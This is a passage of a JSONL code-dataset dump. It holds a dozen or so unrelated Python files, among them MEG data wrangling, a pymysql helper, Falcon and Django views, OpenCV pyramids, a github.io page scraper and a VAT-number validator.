defaults.lowpass\nregex = r\"[0-9]+\"\nsolver = 'lbfgs'\n\n\n# covariates\nmeg, cdi = rd.return_dataframes('mmn', ses=True)\nmeg.reset_index(inplace=True)\nmeg['cdiId'] = ['BAD_%s' % xx for xx in [\n re.findall(regex, ss)[0] for ss in meg.subjId]]\ncdi.rename(columns={'subjId': 'cdiId'}, inplace=True)\ncovs = pd.merge(meg[['ses', 'age', 'gender', 'headSize',\n 'maternalEdu', 'maternalHscore',\n 'paternalEdu', 'paternalHscore',\n 'maternalEthno', 'paternalEthno', 'birthWeight',\n 'subjId', 'cdiId']], cdi, on='cdiId',\n validate='m:m')\ncovs['megId'] = ['bad_%s' % xx for xx in covs.subjId]\ncovs.info()\n\n# Wrangle MEG CDI vars\ndfs = list()\nfor iii, analysis in enumerate(analysese):\n print('Reading data for %s analysis... 
' % analysis)\n if iii == 0:\n conditions = ['standard', 'ba', 'wa']\n else:\n conditions = ['standard', 'deviant']\n combos = list(itertools.combinations(conditions, 2))\n fi_in = op.join(defaults.datadir,\n 'AUC_%d_%s_%s.nc'\n % (lp, solver, analysis))\n ds = xr.open_dataarray(fi_in)\n dfs.append(ds.to_dataframe(name='AUC').reset_index())\ndf = pd.concat(dfs, axis=0, verify_integrity=True, ignore_index=True)\ndf.rename(columns={'subject': 'megId'}, inplace=True)\nDs = df.merge(covs, on='megId', validate='m:m')\nmapping = {'standard-ba': 'plosive',\n 'standard-wa': 'aspirative',\n 'standard-deviant': 'mmn',\n 'ba-wa': 'deviant'}\nDs.replace(mapping, inplace=True)\nDs['vocab-asin'] = np.arcsin(np.sqrt(Ds.vocab.values/Ds.vocab.values.max())) # noqa\nDs['m3l-asin'] = np.arcsin(np.sqrt(Ds.m3l.values/Ds.m3l.values.max()))\nDs.info()\nDs.to_csv(op.join(datadir, 'cdi-meg_%d_%s_tidy_%s.csv' % (lp, solver, date)))\n","sub_path":"badbaby/analysis/write_cdi-meg_dataset.py","file_name":"write_cdi-meg_dataset.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505552833","text":"import sys\nimport matlab.engine\n# from netCDF4 import Dataset\n\nncfilepath = sys.argv[1]\nmatpath = sys.argv[2]\nmatlabpath = sys.argv[3]\nprint(ncfilepath)\nprint(matpath)\nprint(matlabpath)\n\n# Note: the next line starts the matlab command line in the oips project root path\n# thus, it can't find the function Add or Readnc2Json or any other .m file in the same folder as this ReadDepth.py\n# so, the next thing I should do is to fix this!!!!\n# How did I know? add the option \"-desktop\" to the function matlab.engine.start_matlab(),\n# and in the matlab window, you can see the working folder is the oips project root folder\neng = matlab.engine.start_matlab()\n# eng.addpath(\"D:/MyFile/MyCode/Projects/OIPS/models/python/\")\neng.addpath(matlabpath)\neng.addpath(matpath)\n\ntf = eng.isprime(37)\nprint(tf)\na = 3\nb = 4\nc = eng.Add(a, b)\nprint(c)\n\n# eng.ReadNc(ncfilepath)\neng.Readnc2Mat(ncfilepath, matpath,nargout=0)\n# eng.edit('Add', nargout=0)\n\n# rootgrp = Dataset(ncfilepath,\"\")\n\nsys.stdout.flush()\n","sub_path":"models/python/ReadDepth.py","file_name":"ReadDepth.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117651681","text":"# -*- coding:utf-8 -*-\r\n# @Desc : \r\n# @Author : Administrator\r\n# @Date : 2019-05-17 9:49\r\n\r\nimport pymysql\r\nimport json\r\n\r\n# Database info and database creation:\r\n\"\"\"\r\ndb_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"root\",\r\n \"passwd\": \"root\",\r\n \"db\": \"ShuangSeQiuDB\", \r\n}\r\n# Create the database: create database ShuangSeQiuDB default charset=utf8;\r\n\"\"\"\r\n# Create the database table:\r\n\"\"\"\r\nCREATE TABLE excel(\r\n id int(11) NOT NULL,\r\n redOne int(11) DEFAULT NULL,\r\n redTwo int(11) DEFAULT NULL,\r\n redThree int(11) DEFAULT NULL,\r\n redFour int(11) DEFAULT NULL,\r\n redFive int(11) DEFAULT NULL,\r\n redSix int(11) DEFAULT NULL,\r\n blueSeven int(11) DEFAULT NULL,\r\n PRIMARY KEY (id)\r\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\r\n\"\"\"\r\n\r\n\r\nclass MySQLHelper(object):\r\n\r\n def __init__(self, db_config):\r\n # Note: do not connect to the database when the object is created; connect only when it is used\r\n self.connection = None\r\n self.cursor = None\r\n\r\n def query_all_list(self, sql, *args): # query all rows from the database\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = 
self.connection.cursor()\r\n self.cursor.execute(sql, args)\r\n return self.cursor.fetchall()\r\n except Exception as ex:\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def query_one_line(self, sql, *args): # query one row from the database\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute(sql, args)\r\n return self.cursor.fetchone()\r\n except Exception as ex:\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def update_execute(self, sql, *args): # insert, delete, and update operations\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = self.connection.cursor()\r\n # return the number of rows affected by the sql statement\r\n num = self.cursor.execute(sql, args)\r\n self.connection.commit()\r\n return num\r\n except Exception as ex:\r\n self.connection.rollback()\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def close(self): # release resources\r\n if self.cursor: # a cursor was obtained\r\n self.cursor.close()\r\n if self.connection: # the database is connected\r\n self.connection.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n db_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"root\",\r\n \"passwd\": \"root\",\r\n \"db\": \"ShuangSeQiuDB\",\r\n }\r\n helper = MySQLHelper(db_config)\r\n # print(helper.connection)\r\n\r\n # sql = \"select * from excel\"\r\n # print(helper.query_all_list(sql))\r\n # print(helper.query_one_line(sql))\r\n\r\n # query one row by id\r\n # sql = \"select * from excel where id = %s\"\r\n # print(helper.query_one_line(sql,1))\r\n\r\n # drop the database table\r\n # sql = \"drop table excel\"\r\n # print(helper.update_execute(sql))\r\n\r\n # create the database table\r\n # sql = \"\"\"CREATE TABLE excel(\r\n # id int(11) NOT NULL,\r\n # redOne int(11) DEFAULT NULL,\r\n # redTwo int(11) DEFAULT NULL,\r\n # redThree int(11) DEFAULT NULL,\r\n # redFour int(11) DEFAULT NULL,\r\n # redFive int(11) DEFAULT NULL,\r\n # redSix int(11) DEFAULT NULL,\r\n # blueSeven int(11) DEFAULT NULL,\r\n # PRIMARY KEY (id)\r\n # ) ENGINE=InnoDB DEFAULT CHARSET=utf8\"\"\"\r\n # print(helper.update_execute(sql))\r\n\r\n # bulk-insert data (json)\r\n # 1. Insert rows one at a time, with one commit() per row: insert into <table> values(...)\r\n # with open(\"双色球中奖数据保存.json\", encoding=\"utf-8\") as ft:\r\n # ssq_list = ft.readlines() # read the json file and get a list of json strings\r\n # # print(ssq_list,type(ssq_list))\r\n # for json_dict in [json.loads(json_str) for json_str in ssq_list]: # get a list of dicts and iterate over it\r\n # print(json_dict, type(json_dict))\r\n # # sql = \"insert into excel values(json_dict['id'],json_dict['redOne'],json_dict['redTwo'],json_dict['redThree'],json_dict['redFour'],json_dict['redFive'],json_dict['redSix'],json_dict['blueSeven'])\"\r\n # sql = \"insert into excel values(%s,%s,%s,%s,%s,%s,%s,%s)\" % (\r\n # json_dict['id'], json_dict['redOne'], json_dict['redTwo'], json_dict['redThree'], json_dict['redFour'],\r\n # json_dict['redFive'], json_dict['redSix'], json_dict['blueSeven'])\r\n # helper.update_execute(sql)\r\n\r\n # 2. 
Insert multiple rows at once, with a single commit(): insert into <table> values(...),(...)...\r\n sql = \"insert into excel values \"\r\n with open(\"双色球中奖数据保存.json\", encoding=\"utf-8\") as ft:\r\n dict_list = [json.loads(json_str) for json_str in ft.readlines()] # convert the json strings in the file into a list of dicts\r\n # print(dict_list[0],type(dict_list[0]))\r\n for dict in dict_list:\r\n # json_tuple = tuple(dict.values()) # iterate over the dict list and collect each dict's values into a tuple\r\n json_tuple = str(tuple(dict.values())) # iterate over the dict list, collect each dict's values into a tuple, then convert it to a string\r\n # print(json_tuple)\r\n sql += json_tuple + \",\"\r\n # print(sql)\r\n # print(sql.rstrip(\",\"))\r\n helper.update_execute(sql.rstrip(\",\")) # strip the trailing comma from the sql string\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"02.DatabaseDoc/01.数据库-MySQL/10.MySQL插入JSON数据.py","file_name":"10.MySQL插入JSON数据.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450026691","text":"d1 = {\"a\": 100, \"b\":200, \"c\":300, \"z\":500}\nd2 = {\"a\": 300, \"b\": 200, \"c\": 400,\"d\":900}\n\nmylist = []\nmylist.append(d1)\nmylist.append(d2)\n\nresult = {}\n\nfor mydict in mylist:\n for key in mydict:\n if key in result:\n val1 = result[key]\n val2 = mydict[key]\n result[key] = val1+val2\n else:\n result[key] = mydict[key]\n\nprint(result)","sub_path":"python_batch_2/AssignmentSolutions/Dictionary_Solution_19.py","file_name":"Dictionary_Solution_19.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143044488","text":"import falcon\nimport json\nimport datetime\nimport util.helpers as helpers\nfrom util.logging import logger\n\nfrom DBModels.SAP import Orders\nfrom playhouse.shortcuts import model_to_dict\n\ndef build_order_dict(query_object):\n\n out = helpers.defaultdict_nested()\n for order in query_object.naive():\n\n order_key = out[order.order_no][order.ext_item]\n\n # Additional Keys\n order_key[\"sold_to_BP\"] = order.sold_to_party\n order_key[\"contract_account\"] = order.contract_account\n order_key[\"Bladsys_ID\"] = order.old_sub_no\n\n # Product + length details\n order_key[\"orig_item\"] = order.orig_item\n order_key[\"order_valid_from\"] = order.order_valid_from\n order_key[\"order_valid_to\"] = order.order_valid_to\n order_key[\"publication\"] = order.publication\n order_key[\"edition\"] = order.edition\n order_key[\"product_type\"] = order.product_type\n order_key[\"access_level\"] = order.access_level\n order_key[\"sales_doc_type\"] = order.sales_doc_type\n\n # Sub Details\n order_key[\"sub_id\"] = order.sub_id\n order_key[\"sub_valid_from\"] = order.sub_valid_from\n order_key[\"sub_valid_to\"] = order.sub_valid_to\n\n # Channel In\n order_key[\"campaign_id\"] = order.campaign_id\n\n # Termination\n order_key[\"termination_created_on\"] = order.termination_created_on\n order_key[\"end_reason\"] = order.end_reason\n\n order_key[\"items\"][order.order_item] = model_to_dict(order, exclude=[\n Orders.order_no,\n Orders.ext_item,\n Orders.sub_id,\n Orders.order_valid_from,\n Orders.order_valid_to,\n Orders.sold_to_party,\n Orders.contract_account,\n Orders.campaign_id,\n Orders.end_reason,\n Orders.sales_doc_type,\n Orders.sub_valid_to,\n Orders.sub_valid_from,\n Orders.termination_created_on,\n Orders.order_item,\n Orders.orig_item,\n Orders.old_sub_no,\n Orders.publication,\n Orders.edition,\n Orders.product_type,\n Orders.seq_no,\n Orders.access_level\n ])\n\n return out\n\n\nclass Orders_Collection(object):\n def on_get(self, req, resp):\n\n # Max 50 
rows at once; default = 10\n rows = req.get_param_as_int(\"count\", min = 1, max = 50)\n if rows == None:\n rows = 10\n\n # Paging starts at 1\n page = req.get_param_as_int(\"page\", min = 1)\n if page == None:\n page = 1\n\n logger.info(\"Getting page %s of %s records\", page, rows)\n\n query = Orders.select().where(\n (\n (Orders.order_valid_to > datetime.datetime.now()) &\n (Orders.order_valid_from < datetime.datetime.now())\n ),\n Orders.orig_item_indc == \"X\"\n ).order_by(Orders.order_valid_from.desc()).paginate(page, rows)\n\n results = query.__len__()\n\n if(results > 1):\n out = build_order_dict(query)\n else:\n out = {}\n\n resp.body = helpers.formatted_respons(req=req, resp=resp, data=out)\n resp.status = falcon.HTTP_200\n\nclass Orders_Item(object):\n def on_get(self, req, resp, orders):\n\n order_no_ext_tuple = orders.split(sep=\"+\")\n\n for key, value in enumerate(order_no_ext_tuple):\n split = value.split(sep=\"_\")\n\n\n if(len(str(split[0])) != 9):\n raise falcon.HTTPInvalidParam(msg=\"Invalid Order-number '\"+split[0]+\"' - Order-numbers should be 9 digits long\", param_name=\"order-no\")\n\n try:\n split[1] = str(split[1]).rjust(6, '0')\n\n # Defaults to ext_item #1\n if(split[1] == \"000000\"):\n split[1] = \"000010\"\n except:\n # Defaults to first ext_item if nothing's defined\n # Alternative: Throw error for missing ext_item\n split.append(\"000010\")\n\n order_no_ext_tuple[key] = split[0] + \"_\" + split[1]\n\n logger.info(\"Getting records for following pairs of Order_no+Ext_item: %s\", ', '.join(str(e) for e in list(order_no_ext_tuple)))\n\n query = Orders.select().where(\n Orders.order_no+\"_\"+Orders.ext_item << order_no_ext_tuple\n ).order_by(Orders.ext_item.desc()).order_by(Orders.order_item.desc())\n\n results = query.__len__()\n\n if(results >= 1):\n out = build_order_dict(query)\n else:\n out = {\"message\": \"No orders found\"}\n\n resp.body = helpers.formatted_respons(req=req, resp=resp, data=out)\n resp.status = falcon.HTTP_200\n","sub_path":"app/Resources/SAP.py","file_name":"SAP.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254833399","text":"import cv2.cv2 as cv\n\nimg = cv.imread(\"imgs/lena.jpg\")\n\n# simple usage\n\n# lr = cv.pyrDown(img)\n# lr1 = cv.pyrDown(lr)\n# lr2 = cv.pyrDown(lr1)\n#\n#\n# hr = cv.pyrUp(lr2)\n# hr1 = cv.pyrUp(hr)\n# hr2 = cv.pyrUp(hr1)\n#\n# cv.imshow(\"original image\", img)\n# cv.imshow(\"first down\", lr)\n# cv.imshow(\"second down\", lr1)\n# cv.imshow(\"third down\", lr2)\n# cv.imshow(\"first up\", hr)\n# cv.imshow(\"second up\", hr1)\n# cv.imshow(\"third up\", hr2)\n\n\n# laplacian pyramids\nlayer = img.copy()\ngaussian_pyr = [layer]\n\nfor i in range(6):\n layer = cv.pyrDown(layer)\n gaussian_pyr.append(layer)\n # cv.imshow(\"{}-down\".format(i+1), layer)\n\nlayer = gaussian_pyr[5]\ncv.imshow(\"Upper level Gaussian pyramid\", layer)\nlp = layer\n\nfor i in range(5, 0, -1):\n gaussian_expanded = cv.pyrUp(gaussian_pyr[i])\n laplacian_pyr = cv.subtract(gaussian_pyr[i-1], gaussian_expanded)\n cv.imshow(\"{}-pyramid\".format(i), laplacian_pyr)\n\n\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"image_pyramids.py","file_name":"image_pyramids.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551207251","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom application.models 
import Quack, Follow, Profile\nfrom django.contrib.auth.decorators import login_required\nfrom application.forms import UserPanelForm\n\ndef profile(request, username):\n\tcontext = {}\n\ttry:\n\t\tuser = User.objects.get(username=username)\n\t\tprofile = Profile.objects.get(user=user)\n\t\tcontext.update({\n\t\t\t'myprofile': profile,\n\t\t})\n\t\t\n\t\tif request.user.is_authenticated:\n\t\t\tfollower = request.user\n\n\t\t\tif request.method == \"POST\":\n\t\t\t\ttry:\n\t\t\t\t\tfollow = Follow.objects.get(follower=follower, followed=user)\n\t\t\t\t\tfollow.delete()\n\t\t\t\texcept Follow.DoesNotExist:\n\t\t\t\t\tstart_following = Follow()\n\t\t\t\t\tstart_following.follower = follower\n\t\t\t\t\tstart_following.followed = user\n\t\t\t\t\tstart_following.save()\n\n\t\t\tif len(Follow.objects.filter(follower=follower, followed=user)):\n\t\t\t\tcontext.update({\n\t\t\t\t\t'is_following': True\n\t\t\t\t})\n\t\tcontext.update(get_user_context(user))\n\texcept User.DoesNotExist:\n\t\treturn render(request, 'profiles/profile.html', {})\n\n\treturn render(request, 'profiles/profile.html', context)\n\n@login_required(login_url='/login/')\ndef userpanel(request):\n\tprofile = Profile.objects.get(user=request.user)\n\tif request.method == \"POST\":\n\t\tform = UserPanelForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tif request.POST['image_link']:\n\t\t\t\tprofile.image_link = request.POST['image_link']\n\t\t\tif request.POST['description']:\n\t\t\t\tprofile.description = request.POST['description']\n\t\t\tprofile.save()\n\t\t\treturn redirect('/profile/' + request.user.username)\n\telse:\n\t\tform = UserPanelForm()\n\tprint(profile.image_link)\n\tcontext = {\n\t\t'form': form,\n\t\t'myprofile': profile,\n\t}\n\tcontext.update(get_user_context(request.user))\n\treturn render(request, 'profiles/userpanel.html', context)\n\n@login_required(login_url='/login/')\ndef follows(request):\n\tif request.method == \"POST\":\n\t\tfollow_to_delete = Follow.objects.get(pk=request.POST['id'])\n\t\tfollow_to_delete.delete()\n\n\tcontext = get_user_context(request.user)\n\tfollowed_list = Follow.objects.filter(follower=request.user)\n\tfollower_list = Follow.objects.filter(followed=request.user)\n\tfollowed_imgs = []\n\tfollower_imgs = []\n\tfor item in followed_list:\n\t\tfollowed_imgs.append({\n\t\t\t'profile': item,\n\t\t\t'link': Profile.objects.get(user=item.followed).image_link\n\t\t})\n\tfor item in follower_list:\n\t\tfollower_imgs.append({\n\t\t\t'profile': item,\n\t\t\t'link': Profile.objects.get(user=item.follower).image_link\n\t\t})\n\t\tprint(Profile.objects.get(user=item.follower).image_link)\n\tcontext.update({\n\t\t'followed_imgs': followed_imgs,\n\t\t'follower_imgs': follower_imgs,\n\t\t'myprofile': Profile.objects.get(user=request.user)\n\t})\n\n\treturn render(request, 'profiles/follows.html', context)\n\ndef get_user_context(user):\n\tquacks = sorted(Quack.objects.filter(quacker=user), key=lambda quack: quack.created_at, reverse=True)\n\treturn {\n\t\t'profile': user,\n\t\t'quacks': len(quacks),\n\t\t'following': len(Follow.objects.filter(follower=user)),\n\t\t'followers': len(Follow.objects.filter(followed=user)),\n\t\t'quack_list': quacks,\n\t}","sub_path":"application/views/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381039147","text":"# If one number appears exactly once and every other number appears twice, XOR-ing all of them leaves that number\n# As in this problem, if two numbers appear once and the rest appear twice, XOR-ing all of them leaves the XOR of those two numbers\n# 
To separate those two numbers, split the whole array into two groups so that each group contains one of them; split on the lowest bit where the two numbers differ (found by XOR-ing the two numbers and taking the lowest bit that is 1)\n# After splitting, apply the first step to each group to recover the two numbers\nclass Solution:\n def singleNumbers(self, nums: List[int]) -> List[int]:\n x, y, n, m = 0, 0, 0, 1\n for num in nums: # 1. XOR over all numbers\n n ^= num\n while n & m == 0: # 2. shift m left in a loop to find a differing bit\n m <<= 1 \n for num in nums: # 3. iterate over nums and split into groups\n if num & m: x ^= num # 4. when num & m != 0\n else: y ^= num # 4. when num & m == 0\n return x, y # 5. return the numbers that appear once\n","sub_path":"剑指56-1.py","file_name":"剑指56-1.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262005803","text":"from random import choice\nfrom datetime import datetime\n\nfrom nonebot import on_notice, get_driver, get_bots\nfrom nonebot_adapter_gocq.bot import Bot\nfrom nonebot_adapter_gocq.event import GroupDecreaseNoticeEvent, GroupIncreaseNoticeEvent\n# from nonebot import get_loaded_plugins\n\nfrom src.common import refresh_gb_dict\nfrom src.common.easy_setting import SUPERUSERS\nfrom src.common.rules import comman_rule\nfrom src.common.log import logger\n\n\n_plugin_name = 'Bot connection reminder'\n\n\ndriver = get_driver()\n\n\n# online reminder\n@driver.on_bot_connect\nasync def online_remind(bot: Bot):\n # plugins = get_loaded_plugins()\n # normal_plguins = '\\n'.join(map(lambda x: x.module.plugin_name, filter(lambda obj: hasattr(obj.module, 'plugin_name'), plugins)))\n # manager_pligins = '\\n'.join(map(lambda x: x.module._plugin_name, filter(lambda obj: hasattr(obj.module, '_plugin_name'), plugins)))\n # msg = 'online desu\\n[Loaded plugins]:\\n' + normal_plguins + '\\n[Bot management plugins]:\\n' + manager_pligins\n msg = 'online desu'\n await refresh_gb_dict()\n for sps in SUPERUSERS:\n await bot.send_private_msg(user_id=sps, message=msg)\n\n\n# disconnect reminder\n@driver.on_bot_disconnect\nasync def ofl_rmd(bot: Bot):\n dc_time = datetime.now().time().strftime(\"%H:%M:%S\")\n logger.critical(f'Bot {bot.self_id} disconnected')\n await refresh_gb_dict()\n\n ol_bots = [bt for strid, bt in get_bots().items()]\n if ol_bots:\n while ol_bots:\n notifier : Bot = choice(ol_bots)\n try:\n for su in SUPERUSERS:\n await notifier.send_private_msg(user_id=su, message=f' {bot.self_id} disconnected at {dc_time}')\n break\n except BaseException as err:\n logger.error(f'Bot {notifier.self_id} failed to send offline notification: {err}')\n ol_bots.remove(notifier)\n else:\n logger.error(f'All bots failed to send notification!')\n\n else:\n logger.critical('There is no bot that can send the notification!')\n\n\n# kicked-from-group reminder\nkicked = on_notice(rule=comman_rule(GroupDecreaseNoticeEvent, sub_type=\"kick_me\"))\n\n@kicked.handle()\nasync def kicked_remind(bot: Bot, event: GroupDecreaseNoticeEvent):\n msg = f'Kicked from group {event.group_id} by {event.operator_id}'\n logger.info(msg)\n for su in SUPERUSERS:\n await bot.send_private_msg(user_id=su, message=msg)","sub_path":"src/plugins/botmanage/plugins/connect_reminder.py","file_name":"connect_reminder.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560670655","text":"\"\"\" this is the module level DocString \"\"\"\nimport math\n\ndef sqrt(number):\n \"\"\" This method will calculate sqrt of the given number\n\t Args:\n\t integer number\n\t Returns:\n\t sqrt of the given number\n\t\"\"\"\n return math.sqrt(number)\n\t\nif __name__==\"__main__\":\n print(\"execute 'help(doc_string_demo)' on REPL you will see doc strings\")\n 
sqrt(9)","sub_path":"common_topics/doc_string_demo.py","file_name":"doc_string_demo.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220819857","text":"import os\nimport numpy as np\nimport math\nfrom scipy.stats import pearsonr, spearmanr\nfrom sklearn.metrics import (\n matthews_corrcoef,\n f1_score,\n precision_score,\n recall_score,\n classification_report,\n accuracy_score,\n)\n\n\"\"\" Metric Functions \"\"\"\n\n\ndef get_metric_func(metric_name):\n METRIC_MAP = {\n \"acc\": simple_accuracy,\n \"acc_and_f1\": acc_and_f1,\n \"pcc_and_scc\": pearson_and_spearman,\n \"mcc\": mcc,\n }\n return METRIC_MAP[metric_name]\n\n\ndef mcc(labels, preds):\n return {\"mcc\": matthews_corrcoef(labels, preds)}\n\n\ndef simple_accuracy(labels, preds):\n return {\"acc\": accuracy_score(preds, labels)}\n\n\ndef acc_and_f1(labels, preds, average=\"weighted\", target_labels=None):\n f1 = f1_score(y_true=labels, y_pred=preds, average=average, labels=target_labels)\n precision = precision_score(\n y_true=labels, y_pred=preds, average=average, labels=target_labels\n )\n recall = recall_score(\n y_true=labels, y_pred=preds, average=average, labels=target_labels\n )\n metrics_dict = {\n \"f1\": f1,\n \"precision\": precision,\n \"recall\": recall,\n }\n metrics_dict.update(simple_accuracy(labels, preds))\n return metrics_dict\n\n\ndef pearson_and_spearman(labels, preds):\n pearson_corr = pearsonr(preds, labels)[0]\n spearman_corr = spearmanr(preds, labels)[0]\n return {\n \"pearson\": pearson_corr,\n \"spearmanr\": spearman_corr,\n \"corr\": (pearson_corr + spearman_corr) / 2,\n }\n","sub_path":"pymarlin/plugins/hf_seq_classification/metric_utils.py","file_name":"metric_utils.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294635839","text":"# alternate method for just scraping i/o sites\nimport requests\nimport glob\nimport time\nimport random\nfrom random import shuffle\nimport os\nimport shutil\nimport re\n\n\n# this is not an exhaustive list of functions, will need to add to/refactor architecture of module depending on how we want to implement file access and reading\n\n#reads in usernames that have been scraped already\ndef readInUsernames():\n usernames = set()\n\n #walk through username directory\n for file in glob.glob(\"./username_data/*.txt\"):\n #print(\"reading \" + str(file))\n with open(file,\"r\") as datafile:\n for user in datafile:\n user = user.replace(\"\\n\",\"\")\n user = user.strip()\n usernames.add(user)\n\n print(\"found \" + str(len(usernames)) + \" usernames from \" + \"/username_data\")\n return usernames\n\ndef getAlreadyScrapedUsers():\n getUsername = re.compile(r'data/(\\S+)\\_(GithubSiteHTML|INVALID)')\n usernames = set()\n #walk through username directory\n for file in glob.glob(\"./github_site_data/*.html\"):\n #if(\"invalid\" not in file.lower()):\n regsearch = getUsername.search(file)\n if(regsearch != None):\n usernames.add(regsearch.group(1))\n #print(\"Foudn \" + str(file.split(\"_\")[0]))\n return usernames\ndef fixFilenames():\n #walk through username directory\n for file in glob.glob(\"./github_site_data/*.html\"):\n\n if(\"\\\\n\" in file or \"\\n\" in file):\n print(r\"\"+file)\n file2 = file.split(\"/\")[2].replace('\\\\n','')\n shutil.move(file,\"./github_site_data/\"+file2)\n\ndef requestIOSite(username):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS 
X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n url = 'https://'+username.strip()+'.github.io'\n print(username)\n print(\"\\t\" + url)\n try:\n response = requests.get(url,headers=headers)\n except requests.exceptions.ConnectionError as e:\n print(\"CONNECTION ERROR...Sleeping 5 minutes\")\n time.sleep(5*60)\n return -1\n if(response.status_code == 200):\n #valid site\n print(\"\\t(res): VALID\")\n return response.text\n \n else:\n print(\"\\t(res): \" + str(response.status_code))\n return False\n\ndef main():\n errorcount = 0\n print(\"Scraping data from..\")\n print(os.getcwd())\n userSet = readInUsernames()\n listOfUsernames = getAlreadyScrapedUsers()\n\n\n\n\n print(\"Scraped \" + str(len(listOfUsernames))+ \" of \"+ str(len(userSet)) +\" previously\")\n #gets users in a different order\n #random.shuffle(userSet)\n userSet = random.sample(userSet,len(userSet))\n\n \n #scrapes each user\n scrapecount = 0\n for user in userSet:\n if(user in listOfUsernames):\n continue\n\n scrapecount += 1\n\n #every 50 requests, sleep 30 seconds\n if(scrapecount % 50 == 0):\n time.sleep(30)\n\n time.sleep(random.randint(2,8))\n res = requestIOSite(user)\n if(res == -1):\n errorcount +=1\n if(errorcount > 10):\n print(\"10 connection errors, exiting..\")\n exit(1)\n elif(res!= False):\n #writes html to file\n with open(\"./github_site_data/\"+user+\"_GithubSiteHTML.html\",\"w+\") as outfile:\n outfile.write(res)\n else:\n with open(\"./github_site_data/\"+user+\"_INVALID.html\",\"w+\") as outfile:\n outfile.write(\"no data\")\n\n\n print(\"done\")\nif __name__ == '__main__':\n \n main()\n \n\n","sub_path":"github_scraper/github_site_tools/scrape_githubIO_sites.py","file_name":"scrape_githubIO_sites.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410021869","text":"from django.utils import timezone\n\nfrom datetime import timedelta\nimport requests\n\nfrom postgresqleu.invoices.models import VatValidationCache\n\n\ndef validate_eu_vat_number(number):\n if VatValidationCache.objects.filter(vatnumber=number, checkedat__gt=timezone.now() - timedelta(days=90)).exists():\n return None\n\n country = number[:2]\n numberonly = number[2:]\n\n try:\n r = requests.post('http://ec.europa.eu/taxation_customs/vies/vatResponse.html', data={\n 'memberStateCode': country,\n 'number': numberonly,\n 'traderName': '',\n 'traderCompanyType': '',\n 'traderStreet': '',\n 'traderPostalCode': '',\n }, timeout=15)\n if 'Yes, valid VAT number' in r.text:\n VatValidationCache(vatnumber=number).save()\n return None\n return \"Invalid VAT number according to validation service\"\n except Exception as e:\n return \"Unable to reach validation service\"\n","sub_path":"postgresqleu/confsponsor/vatutil.py","file_name":"vatutil.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345502848","text":"import cv2 as cv\nimport numpy as np\nimport g2o\nfrom ch7.triangulation import find_feature_matches, pixel2cam\n\nK = np.array([[520.9, 0, 325.1],\n [0, 521.0, 249.7],\n [0, 0, 1]])\n\n\ndef pose_estimation_3d3d(p_1, p_2):\n q1 = p_1 - np.mean(p_1, axis=0)\n q2 = p_2 - np.mean(p_2, axis=0)\n W = sum([np.matmul(q1i[:, np.newaxis], q2i[:, np.newaxis].transpose()) for q1i, q2i in zip(q1, q2)])\n print('W = \\n', W)\n U, _, V = np.linalg.svd(W)\n if np.linalg.det(U) * np.linalg.det(V) < 0:\n U[:, 2] *= -1\n print('U = \\n', 
